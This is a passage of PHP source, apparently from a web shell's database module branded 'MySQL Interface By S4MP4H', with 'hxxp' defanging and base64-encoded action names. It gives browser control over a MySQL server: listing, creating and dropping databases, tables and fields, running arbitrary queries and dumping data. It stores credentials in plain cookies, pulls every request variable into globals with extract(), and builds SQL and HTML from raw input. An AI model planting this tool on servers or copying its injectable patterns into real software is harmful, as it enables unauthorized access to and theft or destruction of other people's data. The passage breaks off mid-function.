  728. if ( function_exists('ini_get') ) {
  729.     $onoff = ini_get('register_globals');
  730. } else {
  731.     $onoff = get_cfg_var('register_globals');
  732. }
  733. if ($onoff != 1) {
  734.     @extract($hxxp_SERVER_VARS, EXTR_SKIP);
  735.     @extract($hxxp_COOKIE_VARS, EXTR_SKIP);
  736.     @extract($hxxp_POST_FILES, EXTR_SKIP);
  737.     @extract($hxxp_POST_VARS, EXTR_SKIP);
  738.     @extract($hxxp_GET_VARS, EXTR_SKIP);
  739.     @extract($hxxp_ENV_VARS, EXTR_SKIP);
  740. }
  741.  
  742. function logon() {
  743.     global $PHP_SELF;
  744.     setcookie( "mysql_web_admin_username" );
  745.     setcookie( "mysql_web_admin_password" );
  746.     setcookie( "mysql_web_admin_hostname" );
  747.     echo "<table width=100% height=100%><tr><td><center>\n";
  748.     echo "<table cellpadding=2><tr><td><center>\n";
  749.     echo "<table cellpadding=20><tr><td><center>\n";
  750.     echo "<h1>MySQL Interface By S4MP4H</h1>\n";
  751.     echo "<form action='$PHP_SELF'>\n";
  752.     echo "<input type=hidden name=action value=bG9nb25fc3VibWl0>\n";
  753.     echo "<table cellpadding=5 cellspacing=1>\n";
  754.     echo "<tr><td class=\"new\">Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>\n";
  755.     echo "<tr><td class=\"new\">Username </td><td> <input type=text name=username></td></tr>\n";
  756.     echo "<tr><td class=\"new\">Password </td><td> <input type=password name=password></td></tr>\n";
  757.     echo "</table><p>\n";
  758.     echo "<input type=submit value='Enter'>\n";
  759.     echo "<input type=reset value='Clear'><br>\n";
  760.     echo "</form>\n";
  761.     echo "</center></td></tr></table>\n";
  762.     echo "</center></td></tr></table>\n";
  763.     echo "<p><hr width=300>\n";
  764.     echo "</center></td></tr></table>\n";
  765. }
  766.  
  767. function logon_submit() {
  768.     global $username, $password, $hostname ,$PHP_SELF;
  769.     if($hostname =='')
  770.         $hostname = 'localhost';
  771.     setcookie( "mysql_web_admin_username", $username );
  772.     setcookie( "mysql_web_admin_password", $password );
  773.     setcookie( "mysql_web_admin_hostname", $hostname );
  774.     echo "<META hxxp-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=bGlzdERCcw=='>";
  775. }
  776.  
  777. function echoQueryResult() {
  778.     global $queryStr, $errMsg;
  779.     if( $errMsg == "" ) $errMsg = "Success";
  780.     if( $queryStr != "" ) {
  781.         echo "<table cellpadding=5>\n";
  782.         echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
  783.         echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
  784.         echo "</table><p>\n";
  785.     }
  786. }
  787.  
  788. function listDatabases() {
  789.     global $mysqlHandle, $PHP_SELF;
  790.     echo "<h1>Databases List</h1>\n";
  791.     echo "<form action='$PHP_SELF'>\n";
  792.     echo "<input type=hidden name=action value=createDB>\n";
  793.     echo "<input type=text name=dbname>\n";
  794.     echo "<input type=submit value='Create Database'>\n";
  795.     echo "</form>\n";
  796.     echo "<hr>\n";
  797.     echo "<table cellspacing=1 cellpadding=5>\n";
  798.     $pDB = mysql_list_dbs( $mysqlHandle );
  799.     $num = mysql_num_rows( $pDB );
  800.     for( $i = 0; $i < $num; $i++ ) {
  801.         $dbname = mysql_dbname( $pDB, $i );
  802.         echo "<tr>\n";
  803.         echo "<td>$dbname</td>\n";
  804.         echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Tables</a></td>\n";
  805.         echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
  806.         echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
  807.         echo "</tr>\n";
  808.     }
  809.     echo "</table>\n";
  810. }
  811.  
  812. function createDatabase() {
  813.     global $mysqlHandle, $dbname, $PHP_SELF;
  814.     mysql_create_db( $dbname, $mysqlHandle );
  815.     listDatabases();
  816. }
  817.  
  818. function dropDatabase() {
  819.     global $mysqlHandle, $dbname, $PHP_SELF;
  820.     mysql_drop_db( $dbname, $mysqlHandle );
  821.     listDatabases();
  822. }
  823.  
  824. function listTables() {
  825.     global $mysqlHandle, $dbname, $PHP_SELF;
  826.     echo "<h1>Tables List</h1>\n";
  827.     echo "<p class=location>$dbname</p>\n";
  828.     echoQueryResult();
  829.     echo "<form action='$PHP_SELF'>\n";
  830.     echo "<input type=hidden name=action value=createTable>\n";
  831.     echo "<input type=hidden name=dbname value=$dbname>\n";
  832.     echo "<input type=text name=tablename>\n";
  833.     echo "<input type=submit value='Create Table'>\n";
  834.     echo "</form>\n";
  835.     echo "<form action='$PHP_SELF'>\n";
  836.     echo "<input type=hidden name=action value=query>\n";
  837.     echo "<input type=hidden name=dbname value=$dbname>\n";
  838.     echo "<input type=text size=120 name=queryStr>\n";
  839.     echo "<input type=submit value='Query'>\n";
  840.     echo "</form>\n";
  841.     echo "<hr>\n";
  842.     $pTable = mysql_list_tables( $dbname );
  843.     if( $pTable == 0 ) {
  844.         $msg  = mysql_error();
  845.         echo "<h3>Error : $msg</h3><p>\n";
  846.         return;
  847.     }
  848.     $num = mysql_num_rows( $pTable );
  849.     echo "<table cellspacing=1 cellpadding=5>\n";
  850.     for( $i = 0; $i < $num; $i++ ) {
  851.         $tablename = mysql_tablename( $pTable, $i );
  852.         echo "<tr>\n";
  853.         echo "<td>\n";
  854.         echo "$tablename\n";
  855.         echo "</td>\n";
  856.         echo "<td>\n";
  857.         echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
  858.         echo "</td>\n";
  859.         echo "<td>\n";
  860.         echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename'>Data</a>\n";
  861.         echo "</td>\n";
  862.         echo "<td>\n";
  863.         echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
  864.         echo "</td>\n";
  865.         echo "<td>\n";
  866.         echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Dump Table \'$tablename\'?')\">Dump</a>\n";
  867.         echo "</td>\n";
  868.         echo "</tr>\n";
  869.     }
  870.     echo "</table>";
  871. }
  872.  
  873. function createTable() {
  874.  
  875.     global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
  876.     $queryStr = "CREATE TABLE $tablename ( no INT )";
  877.     mysql_select_db( $dbname, $mysqlHandle );
  878.     mysql_query( $queryStr, $mysqlHandle );
  879.     $errMsg = mysql_error();
  880.     listTables();
  881. }
  882.  
  883. function dropTable() {
  884.     global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
  885.     $queryStr = "DROP TABLE $tablename";
  886.     mysql_select_db( $dbname, $mysqlHandle );
  887.     mysql_query( $queryStr, $mysqlHandle );
  888.     $errMsg = mysql_error();
  889.     listTables();
  890. }
  891.  
  892. function viewSchema() {
  893.     global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
  894.     echo "<h1>Table Schema</h1>\n";
  895.     echo "<p class=location>$dbname &gt; $tablename</p>\n";
  896.     echoQueryResult();
  897.     echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
  898.     echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
  899.     echo "<hr>\n";
  900.     $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
  901.     $num = mysql_num_rows( $pResult );
  902.     echo "<table cellspacing=1 cellpadding=5>\n";
  903.     echo "<tr>\n";
  904.     echo "<th>Field</th>\n";
  905.     echo "<th>Type</th>\n";
  906.     echo "<th>Null</th>\n";
  907.     echo "<th>Key</th>\n";
  908.     echo "<th>Default</th>\n";
  909.     echo "<th>Extra</th>\n";
  910.     echo "<th colspan=2>Action</th>\n";
  911.     echo "</tr>\n";
  912.  
  913.     for( $i = 0; $i < $num; $i++ ) {
  914.         $field = mysql_fetch_array( $pResult );
  915.         echo "<tr>\n";
  916.         echo "<td>".$field["Field"]."</td>\n";
  917.         echo "<td>".$field["Type"]."</td>\n";
  918.         echo "<td>".$field["Null"]."</td>\n";
  919.         echo "<td>".$field["Key"]."</td>\n";
  920.         echo "<td>".$field["Default"]."</td>\n";
  921.         echo "<td>".$field["Extra"]."</td>\n";
  922.         $fieldname = $field["Field"];
  923.         echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
  924.         echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
  925.         echo "</tr>\n";
  926.     }
  927.     echo "</table>\n";
  928. }
  929.  
  930. function manageField( $cmd ) {
  931.     global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
  932.     if( $cmd == "add" )
  933.         echo "<h1>Add Field</h1>\n";
  934.     else if( $cmd == "edit" ) {
  935.         echo "<h1>Edit Field</h1>\n";
  936.         $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
  937.         $num = mysql_num_rows( $pResult );
  938.         for( $i = 0; $i < $num; $i++ ) {
  939.             $field = mysql_fetch_array( $pResult );
  940.             if( $field["Field"] == $fieldname ) {
  941.                 $fieldtype = $field["Type"];
  942.                 $fieldkey = $field["Key"];
  943.                 $fieldextra = $field["Extra"];
  944.                 $fieldnull = $field["Null"];
  945.                 $fielddefault = $field["Default"];
  946.                 break;
  947.             }
  948.         }
  949.  
  950.         $type = strtok( $fieldtype, " (,)\n" );
  951.         if( strpos( $fieldtype, "(" ) ) {
  952.             if( $type == "enum" | $type == "set" ) {
  953.                 $valuelist = strtok( " ()\n" );
  954.             } else {
  955.                 $M = strtok( " (,)\n" );
  956.                 if( strpos( $fieldtype, "," ) )
  957.                     $D = strtok( " (,)\n" );
  958.             }
  959.         }
  960.     }
  961.  
  962.     echo "<p class=location>$dbname &gt; $tablename</p>\n";
  963.     echo "<form action=$PHP_SELF>\n";
  964.     if( $cmd == "add" )
  965.         echo "<input type=hidden name=action value=addField_submit>\n";
  966.     else if( $cmd == "edit" ) {
  967.         echo "<input type=hidden name=action value=editField_submit>\n";
  968.         echo "<input type=hidden name=old_name value=$fieldname>\n";
  969.     }
  970.     echo "<input type=hidden name=dbname value=$dbname>\n";
  971.     echo "<input type=hidden name=tablename value=$tablename>\n";
  972.     echo "<h3>Name</h3>\n";
  973.     echo "<input type=text name=name value=$fieldname><p>\n";
  974.     echo '
  975.  
  976. <h3>Type</h3>
  977. <font size=2 class="new">
  978. * `M\' indicates the maximum display size.<br>
  979. * `D\' applies to floating-point types and indicates the number of digits following the decimal point.<br>
  980. </font>
  981. <table>
  982. <tr>
  983. <th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
  984. </tr>
  985. <tr>
  986. <td><input type=radio name=type value="TINYINT" '; if( $type == "tinyint" ) echo "checked";echo '>TINYINT (-128 ~ 127)</td>
  987. <td align=center>O</td>
  988. <td>&nbsp</td>
  989. <td align=center>O</td>
  990. <td align=center>O</td>
  991. <td>&nbsp</td>
  992. </tr>
  993. <tr>
  994. <td><input type=radio name=type value="SMALLINT" '; if( $type == "smallint" ) echo "checked";echo '>SMALLINT (-32768 ~ 32767)</td>
  995. <td align=center>O</td>
  996. <td>&nbsp</td>
  997. <td align=center>O</td>
  998. <td align=center>O</td>
  999. <td>&nbsp</td>
  1000. </tr>
  1001. <tr>
  1002. <td><input type=radio name=type value="MEDIUMINT" '; if( $type == "mediumint" ) echo "checked";echo '>MEDIUMINT (-8388608 ~ 8388607)</td>
  1003. <td align=center>O</td>
  1004. <td>&nbsp</td>
  1005. <td align=center>O</td>
  1006. <td align=center>O</td>
  1007. <td>&nbsp</td>
  1008. </tr>
  1009. <tr>
  1010. <td><input type=radio name=type value="INT" '; if( $type == "int" ) echo "checked";echo '>INT (-2147483648 ~ 2147483647)</td>
  1011. <td align=center>O</td>
  1012. <td>&nbsp</td>
  1013. <td align=center>O</td>
  1014. <td align=center>O</td>
  1015. <td>&nbsp</td>
  1016. </tr>
  1017. <tr>
  1018. <td><input type=radio name=type value="BIGINT" '; if( $type == "bigint" ) echo "checked";echo '>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
  1019. <td align=center>O</td>
  1020. <td>&nbsp</td>
  1021. <td align=center>O</td>
  1022. <td align=center>O</td>
  1023. <td>&nbsp</td>
  1024. </tr>
  1025. <tr>
  1026. <td><input type=radio name=type value="FLOAT" '; if( $type == "float" ) echo "checked";echo '>FLOAT</td>
  1027. <td align=center>O</td>
  1028. <td align=center>O</td>
  1029. <td>&nbsp</td>
  1030. <td align=center>O</td>
  1031. <td>&nbsp</td>
  1032. </tr>
  1033. <tr>
  1034. <td><input type=radio name=type value="DOUBLE" '; if( $type == "double" ) echo "checked";echo '>DOUBLE</td>
  1035. <td align=center>O</td>
  1036. <td align=center>O</td>
  1037. <td>&nbsp</td>
  1038. <td align=center>O</td>
  1039. <td>&nbsp</td>
  1040. </tr>
  1041. <tr>
  1042. <td><input type=radio name=type value="DECIMAL" '; if( $type == "decimal" ) echo "checked";echo '>DECIMAL(NUMERIC)</td>
  1043. <td align=center>O</td>
  1044. <td align=center>O</td>
  1045. <td>&nbsp</td>
  1046. <td align=center>O</td>
  1047. <td>&nbsp</td>
  1048. </tr>
  1049. <tr>
  1050. <td><input type=radio name=type value="DATE" '; if( $type == "date" ) echo "checked";echo '>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
  1051. <td>&nbsp</td>
  1052. <td>&nbsp</td>
  1053. <td>&nbsp</td>
  1054. <td>&nbsp</td>
  1055. <td>&nbsp</td>
  1056. </tr>
  1057. <tr>
  1058. <td><input type=radio name=type value="DATETIME" '; if( $type == "datetime" ) echo "checked";echo '>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
  1059. <td>&nbsp</td>
  1060. <td>&nbsp</td>
  1061. <td>&nbsp</td>
  1062. <td>&nbsp</td>
  1063. <td>&nbsp</td>
  1064. </tr>
  1065. <tr>
  1066. <td><input type=radio name=type value="TIMESTAMP" '; if( $type == "timestamp" ) echo "checked";echo '>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
  1067. <td align=center>O</td>
  1068. <td>&nbsp</td>
  1069. <td>&nbsp</td>
  1070. <td>&nbsp</td>
  1071. <td>&nbsp</td>
  1072. </tr>
  1073. <tr>
  1074. <td><input type=radio name=type value="TIME" '; if( $type == "time" ) echo "checked";echo '>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
  1075. <td>&nbsp</td>
  1076. <td>&nbsp</td>
  1077. <td>&nbsp</td>
  1078. <td>&nbsp</td>
  1079. <td>&nbsp</td>
  1080. </tr>
  1081. <tr>
  1082. <td><input type=radio name=type value="YEAR" '; if( $type == "year" ) echo "checked";echo '>YEAR (1901 ~ 2155, 0000, YYYY)</td>
  1083. <td>&nbsp</td>
  1084. <td>&nbsp</td>
  1085. <td>&nbsp</td>
  1086. <td>&nbsp</td>
  1087. <td>&nbsp</td>
  1088. </tr>
  1089. <tr>
  1090. <td><input type=radio name=type value="CHAR" '; if( $type == "char" ) echo "checked";echo '>CHAR</td>
  1091. <td align=center>O</td>
  1092. <td>&nbsp</td>
  1093. <td>&nbsp</td>
  1094. <td>&nbsp</td>
  1095. <td align=center>O</td>
  1096. </tr>
  1097. <tr>
  1098. <td><input type=radio name=type value="VARCHAR" '; if( $type == "varchar" ) echo "checked";echo '>VARCHAR</td>
  1099. <td align=center>O</td>
  1100. <td>&nbsp</td>
  1101. <td>&nbsp</td>
  1102. <td>&nbsp</td>
  1103. <td align=center>O</td>
  1104. </tr>
  1105. <tr>
  1106. <td><input type=radio name=type value="TINYTEXT" '; if( $type == "tinytext" ) echo "checked";echo '>TINYTEXT (0 ~ 255)</td>
  1107. <td>&nbsp</td>
  1108. <td>&nbsp</td>
  1109. <td>&nbsp</td>
  1110. <td>&nbsp</td>
  1111. <td>&nbsp</td>
  1112. </tr>
  1113. <tr>
  1114. <td><input type=radio name=type value="TEXT" '; if( $type == "text" ) echo "checked";echo '>TEXT (0 ~ 65535)</td>
  1115. <td>&nbsp</td>
  1116. <td>&nbsp</td>
  1117. <td>&nbsp</td>
  1118. <td>&nbsp</td>
  1119. <td>&nbsp</td>
  1120. </tr>
  1121. <tr>
  1122. <td><input type=radio name=type value="MEDIUMTEXT" '; if( $type == "mediumtext" ) echo "checked";echo '>MEDIUMTEXT (0 ~ 16777215)</td>
  1123. <td>&nbsp</td>
  1124. <td>&nbsp</td>
  1125. <td>&nbsp</td>
  1126. <td>&nbsp</td>
  1127. <td>&nbsp</td>
  1128. </tr>
  1129. <tr>
  1130. <td><input type=radio name=type value="LONGTEXT" '; if( $type == "longtext" ) echo "checked";echo '>LONGTEXT (0 ~ 4294967295)</td>
  1131. <td>&nbsp</td>
  1132. <td>&nbsp</td>
  1133. <td>&nbsp</td>
  1134. <td>&nbsp</td>
  1135. <td>&nbsp</td>
  1136. </tr>
  1137. <tr>
  1138. <td><input type=radio name=type value="TINYBLOB" '; if( $type == "tinyblob" ) echo "checked";echo '>TINYBLOB (0 ~ 255)</td>
  1139. <td>&nbsp</td>
  1140. <td>&nbsp</td>
  1141. <td>&nbsp</td>
  1142. <td>&nbsp</td>
  1143. <td>&nbsp</td>
  1144. </tr>
  1145. <tr>
  1146. <td><input type=radio name=type value="BLOB" '; if( $type == "blob" ) echo "checked";echo '>BLOB (0 ~ 65535)</td>
  1147. <td>&nbsp</td>
  1148. <td>&nbsp</td>
  1149. <td>&nbsp</td>
  1150. <td>&nbsp</td>
  1151. <td>&nbsp</td>
  1152. </tr>
  1153. <tr>
  1154. <td><input type=radio name=type value="MEDIUMBLOB" '; if( $type == "mediumblob" ) echo "checked";echo '>MEDIUMBLOB (0 ~ 16777215)</td>
  1155. <td>&nbsp</td>
  1156. <td>&nbsp</td>
  1157. <td>&nbsp</td>
  1158. <td>&nbsp</td>
  1159. <td>&nbsp</td>
  1160. </tr>
  1161. <tr>
  1162. <td><input type=radio name=type value="LONGBLOB" '; if( $type == "longblob" ) echo "checked";echo '>LONGBLOB (0 ~ 4294967295)</td>
  1163. <td>&nbsp</td>
  1164. <td>&nbsp</td>
  1165. <td>&nbsp</td>
  1166. <td>&nbsp</td>
  1167. <td>&nbsp</td>
  1168. </tr>
  1169. <tr>
  1170. <td><input type=radio name=type value="ENUM" '; if( $type == "enum" ) echo "checked";echo '>ENUM</td>
  1171. <td colspan=5><center>value list</center></td>
  1172. </tr>
  1173. <tr>
  1174. <td><input type=radio name=type value="SET" '; if( $type == "set" ) echo "checked";echo '>SET</td>
  1175. <td colspan=5><center>value list</center></td>
  1176. </tr>
  1177. </table>
  1178. <table>
  1179. <tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: \'apple\', \'orange\', \'banana\') </th></tr>
  1180. <tr>
  1181. <td align=center><input type=text size=4 name=M '; if( $M != "" ) echo "value=$M";echo '></td>
  1182. <td align=center><input type=text size=4 name=D '; if( $D != "" ) echo "value=$D";echo '></td>
  1183. <td align=center><input type=checkbox name=unsigned value="UNSIGNED" '; if( strpos( $fieldtype, "unsigned" ) ) echo "checked";echo '></td>
  1184. <td align=center><input type=checkbox name=zerofill value="ZEROFILL" '; if( strpos( $fieldtype, "zerofill" ) ) echo "checked";echo '></td>
  1185. <td align=center><input type=checkbox name=binary value="BINARY" '; if( strpos( $fieldtype, "binary" )  ) echo "checked";echo '></td>
  1186. <td align=center><input type=text size=60 name=valuelist '; if( $valuelist != "" ) echo "value=\"$valuelist\"";echo '></td>
  1187. </tr>
  1188. </table>
  1189. <h3>Flags</h3>
  1190. <table>
  1191. <tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
  1192. <tr>
  1193. <td align=center><input type=checkbox name=not_null value="NOT NULL" '; if( $fieldnull != "YES" ) echo "checked";echo '></td>
  1194. <td align=center><input type=text name=default_value '; if( $fielddefault != "" ) echo "value=$fielddefault";echo '></td>
  1195. <td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" '; if( $fieldextra == "auto_increment" ) echo "checked";echo '></td>
  1196. <td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" '; if( $fieldkey == "PRI" ) echo "checked";echo '></td>
  1197. </tr>
  1198. </table>
  1199. <p>';
  1200.     if( $cmd == "add" )
  1201.         echo "<input type=submit value='Add Field'>\n";
  1202.     else if( $cmd == "edit" )
  1203.         echo "<input type=submit value='Edit Field'>\n";
  1204.     echo "<input type=button value=Cancel onClick='history.back()'>\n";
  1205.     echo "</form>\n";
  1206. }
  1207.  
  1208. function manageField_submit( $cmd ) {
  1209.     global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
  1210.         $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
  1211.     if( $cmd == "add" )
  1212.         $queryStr = "ALTER TABLE $tablename ADD $name ";
  1213.     else if( $cmd == "edit" )
  1214.         $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
  1215.     if( $M != "" )
  1216.         if( $D != "" )
  1217.             $queryStr .= "$type($M,$D) ";
  1218.         else
  1219.             $queryStr .= "$type($M) ";
  1220.     else if( $valuelist != "" ) {
  1221.         $valuelist = stripslashes( $valuelist );
  1222.         $queryStr .= "$type($valuelist) ";
  1223.     } else
  1224.         $queryStr .= "$type ";
  1225.     $queryStr .= "$unsigned $zerofill $binary ";
  1226.     if( $default_value != "" )
  1227.         $queryStr .= "DEFAULT '$default_value' ";
  1228.     $queryStr .= "$not_null $auto_increment";
  1229.     mysql_select_db( $dbname, $mysqlHandle );
  1230.     mysql_query( $queryStr, $mysqlHandle );
  1231.     $errMsg = mysql_error();
  1232.     // key change
  1233.     $keyChange = false;
  1234.     $result = mysql_query( "SHOW KEYS FROM $tablename" );
  1235.     $primary = "";
  1236.     while( $row = mysql_fetch_array($result) )
  1237.         if( $row["Key_name"] == "PRIMARY" ) {
  1238.             if( $row[Column_name] == $name )
  1239.                 $keyChange = true;
  1240.             else
  1241.                 $primary .= ", $row[Column_name]";
  1242.         }
  1243.     if( $primary_key == "PRIMARY KEY" ) {
  1244.         $primary .= ", $name";
  1245.         $keyChange = !$keyChange;
  1246.     }
  1247.     $primary = substr( $primary, 2 );
  1248.     if( $keyChange == true ) {
  1249.         $q = "ALTER TABLE $tablename DROP PRIMARY KEY";
  1250.         mysql_query( $q );
  1251.         $queryStr .= "<br>\n" . $q;
  1252.         $errMsg .= "<br>\n" . mysql_error();
  1253.         $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
  1254.         mysql_query( $q );
  1255.         $queryStr .= "<br>\n" . $q;
  1256.         $errMsg .= "<br>\n" . mysql_error();
  1257.     }
  1258.     viewSchema();
  1259. }
  1260.  
  1261. function dropField() {
  1262.     global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
  1263.     $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
  1264.     mysql_select_db( $dbname, $mysqlHandle );
  1265.     mysql_query( $queryStr , $mysqlHandle );
  1266.     $errMsg = mysql_error();
  1267.     viewSchema();
  1268. }
  1269.  
  1270. function viewData( $queryStr ) {
  1271.     global $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
  1272.     echo "<h1>Data in Table</h1>\n";
  1273.     if( $tablename != "" )
  1274.         echo "<p class=location>$dbname &gt; $tablename</p>\n";
  1275.     else
  1276.         echo "<p class=location>$dbname</p>\n";
  1277.     $queryStr = stripslashes( $queryStr );
  1278.     if( $queryStr == "" ) {
  1279.         $queryStr = "SELECT * FROM $tablename";
  1280.         if( $orderby != "" )
  1281.             $queryStr .= " ORDER BY $orderby";
  1282.         echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
  1283.         echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
  1284.     }
  1285.     $pResult = mysql_db_query( $dbname, $queryStr );
  1286.     $fieldt = mysql_fetch_field($pResult);
  1287.     $tablename = $fieldt->table;
  1288.     $errMsg = mysql_error();
  1289.     $GLOBALS[queryStr] = $queryStr;
  1290.     if( $pResult == false ) {
  1291.         echoQueryResult();
  1292.         return;
  1293.     }
  1294.     if( $pResult == 1 ) {
  1295.         $errMsg = "Success";
  1296.         echoQueryResult();
  1297.         return;
  1298.     }
  1299.     echo "<hr>\n";
  1300.     $row = mysql_num_rows( $pResult );
  1301.     $col = mysql_num_fields( $pResult );
  1302.     if( $row == 0 ) {
  1303.         echo "No Data Exist!";
  1304.         return;
  1305.     }
  1306.     if( $rowperpage == "" ) $rowperpage = 30;
  1307.     if( $page == "" ) $page = 0;
  1308.     else $page--;
  1309.     mysql_data_seek( $pResult, $page * $rowperpage );
  1310.     echo "<table cellspacing=1 cellpadding=2>\n";
  1311.     echo "<tr>\n";
  1312.     for( $i = 0; $i < $col; $i++ ) {
  1313.         $field = mysql_fetch_field( $pResult, $i );
  1314.         echo "<th>";
  1315.         if($action == "dmlld0RhdGE=")
  1316.             echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
  1317.         else
  1318.             echo $field->name."\n";
  1319.         echo "</th>\n";
  1320.     }
  1321.     echo "<th colspan=2>Action</th>\n";
  1322.     echo "</tr>\n";
  1323.     for( $i = 0; $i < $rowperpage; $i++ ) {
  1324.         $rowArray = mysql_fetch_row( $pResult );
  1325.         if( $rowArray == false ) break;
  1326.         echo "<tr>\n";
  1327.         $key = "";
  1328.         for( $j = 0; $j < $col; $j++ ) {
  1329.             $data = $rowArray[$j];
  1330.             $field = mysql_fetch_field( $pResult, $j );
  1331.             if( $field->primary_key == 1 )
  1332.                 $key .= "&" . $field->name . "=" . $data;
  1333.             if( strlen( $data ) > 30 )
  1334.                 $data = substr( $data, 0, 30 ) . "...";
  1335.             $data = htmlspecialchars( $data );
  1336.             echo "<td>\n";
  1337.             echo "$data\n";
  1338.             echo "</td>\n";
  1339.         }
  1340.         if( $key == "" )
  1341.             echo "<td colspan=2>no Key</td>\n";
  1342.         else {
  1343.             echo "<td><a href='$PHP_SELF?action=editData$key&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
  1344.             echo "<td><a href='$PHP_SELF?action=deleteData$key&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
  1345.         }
  1346.         echo "</tr>\n";
  1347.     }
  1348.     echo "</table>\n";
  1349.     echo "<font size=2 class=\"new\">\n";
  1350.     if($action == "dmlld0RhdGE=")
  1351.         echo "<form action='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename' method=post>\n";
  1352.     else
  1353.         echo "<form action='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr' method=post>\n";
  1354.     echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
  1355.     echo "</font>\n";
  1356.     echo " | ";
  1357.     if( $page > 0 ) {
  1358.         if($action == "dmlld0RhdGE=")
  1359.             echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&page=".($page);
  1360.         else
  1361.             echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page);
  1362.         if( $orderby != "" && $action == "dmlld0RhdGE=")
  1363.             echo "&orderby=$orderby";
  1364.         echo "'>Prev</a>\n";
  1365.     } else
  1366.         echo "<font size=2 class=\"new\">Prev</font>";
  1367.     echo " | ";
  1368.     if( $page < ($row/$rowperpage)-1 ) {
  1369.         if($action == "dmlld0RhdGE=")
  1370.             echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&page=".($page+2);
  1371.         else
  1372.             echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page+2);
  1373.         if( $orderby != "" && $action == "dmlld0RhdGE=")
  1374.             echo "&orderby=$orderby";
  1375.         echo "'>Next</a>\n";
  1376.     } else
  1377.         echo "Next";
  1378.     echo " | ";
  1379.     if( $row > $rowperpage ) {
  1380.         echo "<input type=text size=4 name=page>\n";
  1381.         echo "<input type=submit value='Go'>\n";
  1382.     }
  1383.     echo "</form>\n";
  1384.     echo "</font>\n";
  1385. }
  1386.  
  1387. function manageData( $cmd ) {
  1388.     global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
  1389.     if( $cmd == "add" )
  1390.         echo "<h1>Add Data</h1>\n";
  1391.     else if( $cmd == "edit" ) {
  1392.         echo "<h1>Edit Data</h1>\n";
  1393.         $pResult = mysql_list_fields( $dbname, $tablename );
  1394.         $num = mysql_num_fields( $pResult );
  1395.         $key = "";
  1396.         for( $i = 0; $i < $num; $i++ ) {
  1397.             $field = mysql_fetch_field( $pResult, $i );
  1398.             if( $field->primary_key == 1 )
  1399.                 if( $field->numeric == 1 )
  1400.                     $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
  1401.                 else
